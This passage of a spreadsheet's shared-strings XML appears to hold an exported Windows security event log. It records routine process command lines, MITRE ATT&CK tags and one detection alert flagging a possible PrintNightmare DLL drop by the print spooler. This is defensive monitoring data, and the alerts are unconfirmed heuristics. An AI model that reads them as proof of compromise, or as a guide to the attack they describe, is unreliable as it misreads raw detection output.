    <t>[Lateral Movement]</t>
  </si>
  <si>
    <t>[Lateral Tool Transfer]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:18.823</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:20.911</t>
  </si>
  <si>
    <t>Software protection service scheduled successfully.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:30.472</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:30.503</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k AppReadiness -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:33.376</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:40.665</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\wuaucltcore.exe\" /DeploymentHandlerFullPath \\\\?\\C:\\Windows\\UUS\\Packages\\Preview\\AMD64\\UpdateDeploy.dll /ClassId d4f55271-a065-43c4-9ef1-8fa388524143 /RunHandlerComServer</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:40.698</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:42.358</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\SoftwareDistribution\\Download\\Install\\AM_Delta.exe\" WD /q</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:42.382</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\MpSigStub.exe /stub 1.1.24010.2001 /payload 1.427.717.0 /MpWUStub /program C:\\WINDOWS\\SoftwareDistribution\\Download\\Install\\AM_Delta.exe WD /q</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:52.914</t>
  </si>
  <si>
    <t>DLL file created by printer spool service, possible malware binary drop from PrintNightmare exploit</t>
  </si>
  <si>
    <t>[T1574.010]</t>
  </si>
  <si>
    <t>[Persistence, Privilege Escalation, Defense Evasion]</t>
  </si>
  <si>
    <t>[Services File Permissions Weakness]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:52.933</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:52.955</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:52.956</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:52.957</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:52.992</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:53.343</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\regsvr32.exe /s \"C:\\WINDOWS\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:54.212</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:55.406</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\SysWOW64\\regsvr32.exe /s \"C:\\WINDOWS\\SysWOW64\\PrintConfig.dll\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:56.138</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /svc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:56.139</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\vdsldr.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:56.202</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:56.231</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\vds.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:57.933</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /c</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:58.016</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:58.025</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k InvSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:58.078</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /ua /installsource core</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:01.209</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:14.935</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:25.846</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:25.850</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:27.782</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:28.109</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:29.302</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\Microsoft.NET\\Framework\\v4.0.30319\\Ngen.exe  Update /Queue /Delay</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:29.368</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\Microsoft.NET\\Framework64\\v4.0.30319\\Ngen.exe  Update /Queue /Delay</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:29.369</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:29.403</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:30.381</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 22c -InterruptEvent 0 -NGENProcess 21c -Pipe 228 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:30.400</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 270 -InterruptEvent 0 -NGENProcess 228 -Pipe 22c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:31.462</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 0 -NGENProcess 22c -Pipe 298 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:31.522</t>
  </si>
  <si>
    <t>taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:31.537</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 0 -NGENProcess 274 -Pipe 29c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:31.567</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 324 -InterruptEvent 0 -NGENProcess 318 -Pipe 320 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:33.038</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 338 -InterruptEvent 0 -NGENProcess 340 -Pipe 32c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:33.099</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /Critical /StopEvent:532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:33.100</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:33.104</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /Critical /StopEvent:1000</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:34.222</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:38.315</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\" ExecuteQueuedItems 2 /LegacyServiceBehavior</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:38.331</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\" ExecuteQueuedItems 2 /LegacyServiceBehavior</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:41.185</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{172FB946-0164-4D00-A83D-BE8209EC2B2D}\\MicrosoftEdgeUpdateSetup_X86_1.3.195.57.exe\" /update /sessionid \"{8E3A38FA-F7C6-41D9-BDED-1351E9BD89A1}\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:41.241</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDkiIHNoZWxsX3ZlcnNpb249IjEuMy4xODUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OEUzQTM4RkEtRjdDNi00MUQ5LUJERUQtMTM1MUU5QkQ4OUExfSIgdXNlcmlkPSJ7MjdBMTkwQjUtNkFFQy00OTg4LThBMDQtM0Y5QjY5Njc3RUU0fSIgaW5zdGFsbHNvdXJjZT0iY29yZSIgcmVxdWVzdGlkPSJ7OEI1ODBBRUMtNTlEMS00NzFCLUI2RTgtQkE1ODkxNjRFQTI0fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjQiIHBoeXNtZW1vcnk9IjIiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yNjEwMC4zNzc1IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlZNd2FyZSwgSW5jLiIgcHJvZHVjdF9uYW1lPSJWTXdhcmUyMCwxIi8-PGV4cCBldGFnPSImcXVvdDtFK3hiQXo2WTZzVTEyODliUzZxbDRWUkxia2pmQlVHVE1Kc2pySHI0NGlJPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQ5IiBuZXh0dmVyc2lvbj0iMS4zLjE5NS41NyIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjQ1IiBjb2hvcnQ9InJyZkAwLjExIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIyMDczODA5MjczIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjIwNzQ0NTM5NTQiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMjEyMDM5ODk5MyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzM1OGI3ZjNkLWI3YjctNDdmNS1hYmQxLWZiNjFkMTNmMGRhOD9QMT0xNzQ3MzkwNTk0JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWt4ZTNUeDlpY2JZN25ZUWZJQjNrVGNqVlNIbWliQlhuallCJTJmN0RWTDVQdWRHM0hhZWJteGJKQUh5Z2tTVXh5bk9NYjR4TFFHcVdKbFhlOUtpejRWRlElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIxNjU2OTA0IiB0b3RhbD0iMTY1NjkwNCIgZG93bmxvYWRfdGltZV9tcz0iMjc5MSIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIyMTIwOTg2NTIzIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjIxMjcyOTQzMDMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48cGluZyByPSI3IiByZD0iNjY5NiIgcGluZ19mcmVzaG5lc3M9IntGMUIxRjg5RS04RURFLTQyRDYtODBENS1DQjQ5ODQ0RTUwMTB9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjEzNS4wLjMxNzkuOTgiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSIgaW5zdGFsbGFnZT0iNDUiIGNvaG9ydD0icnJmQDAuOTAiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4NzMyNzEyNjI3ODEwMTAiIHVwZGF0ZV9jb3VudD0iNCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSI3IiByZD0iNjY5NiIgcGluZ19mcmVzaG5lc3M9Ins4NDc4NjY5Qy02MjVCLTQ2MzQtOTBFNy0yQTYyOTFDOEZEQjZ9Ii8-PC9hcHA-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IjEzNS4wLjMxNzkuOTgiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSIgaW5zdGFsbGFnZT0iNDUiIGNvaG9ydD0icnJmQDAuMjkiIHVwZGF0ZV9jb3VudD0iNCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSI3IiByZD0iNjY5NiIgcGluZ19mcmVzaG5lc3M9Ins5NDExMTZBNS0xQzMzLTRCNkUtOEQ2OC02QTc5QkI0RUQ3NkJ9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:46.707</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:46.721</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 244 -Pipe 28c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:47.819</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k LocalService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:47.858</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Temp\\EU4353.tmp\\MicrosoftEdgeUpdate.exe\" /update /sessionid \"{8E3A38FA-F7C6-41D9-BDED-1351E9BD89A1}\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:50.252</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:50.313</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 308 -InterruptEvent 0 -NGENProcess 304 -Pipe 2f4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:16:52.118</t>
  </si>
  <si>
    <t>taskhostw.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:18:59.246</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:02.111</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:02.458</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 330 -Pipe 308 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:02.735</t>
  </si>
  <si>
    <t>The Windows search service started.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:02.991</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.008</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.262</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /regserver</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.277</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.478</t>
  </si>
  <si>
    <t>SYSTEM</t>
  </si>
  <si>
    <t>Windows Defender: Antimalware definitions updated successfully</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.559</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.691</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.57\\MicrosoftEdgeUpdateComRegisterShell64.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.838</t>
  </si>
  <si>
    <t>System time changed</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.866</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.884</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\dmclient.exe\" utcwnf</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:03.927</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.046</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 344 -Pipe 25c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.056</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.057</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.151</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 334 -InterruptEvent 0 -NGENProcess 324 -Pipe 304 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 334 -InterruptEvent 0 -NGENProcess 348 -Pipe 340 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.152</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 364 -InterruptEvent 0 -NGENProcess 35c -Pipe 360 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.196</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.197</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\SearchIndexer.exe /Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.245</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 358 -InterruptEvent 0 -NGENProcess 364 -Pipe 398 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.246</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.249</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.261</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.280</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.281</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 368 -InterruptEvent 0 -NGENProcess 348 -Pipe 310 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.312</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.329</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNTciIHNoZWxsX3ZlcnNpb249IjEuMy4xODUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OEUzQTM4RkEtRjdDNi00MUQ5LUJERUQtMTM1MUU5QkQ4OUExfSIgdXNlcmlkPSJ7MjdBMTkwQjUtNkFFQy00OTg4LThBMDQtM0Y5QjY5Njc3RUU0fSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7QzdFMDUxMTQtRUFGRS00MTA3LTg3OTYtNzdFMERENDRDNTA1fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjQiIHBoeXNtZW1vcnk9IjIiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yNjEwMC4zNzc1IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlZNd2FyZSwgSW5jLiIgcHJvZHVjdF9uYW1lPSJWTXdhcmUyMCwxIi8-PGV4cCBldGFnPSImcXVvdDtFK3hiQXo2WTZzVTEyODliUzZxbDRWUkxia2pmQlVHVE1Kc2pySHI0NGlJPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQ5IiBuZXh0dmVyc2lvbj0iMS4zLjE5NS41NyIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjQ1IiBpbnN0YWxsZGF0ZXRpbWU9IjE3NDI4NTMyMzAiIGNvaG9ydD0icnJmQDAuMTEiPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjI1MDgwMTE5MDkiLz48L2FwcD48L3JlcXVlc3Q-</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.330</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 36c -InterruptEvent 0 -NGENProcess 364 -Pipe 310 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.356</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3a4 -InterruptEvent 0 -NGENProcess 35c -Pipe 3a0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.376</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 34c -InterruptEvent 0 -NGENProcess 39c -Pipe 36c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.403</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 258 -InterruptEvent 0 -NGENProcess 270 -Pipe 34c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 35c -InterruptEvent 0 -NGENProcess 388 -Pipe 39c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.419</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 398 -InterruptEvent 0 -NGENProcess 350 -Pipe 3bc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.453</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 35c -InterruptEvent 0 -NGENProcess 3b0 -Pipe 330 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.456</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 294 -InterruptEvent 0 -NGENProcess 280 -Pipe 290 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.467</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 238 -InterruptEvent 0 -NGENProcess 2d4 -Pipe 248 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.515</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\" install \"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.527</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe1_ Global\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.555</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 218 -InterruptEvent 0 -NGENProcess 304 -Pipe 210 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.590</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 320 -InterruptEvent 0 -NGENProcess 314 -Pipe 31c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 0 -NGENProcess 238 -Pipe 2cc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.633</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 0 -NGENProcess 238 -Pipe 1f0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
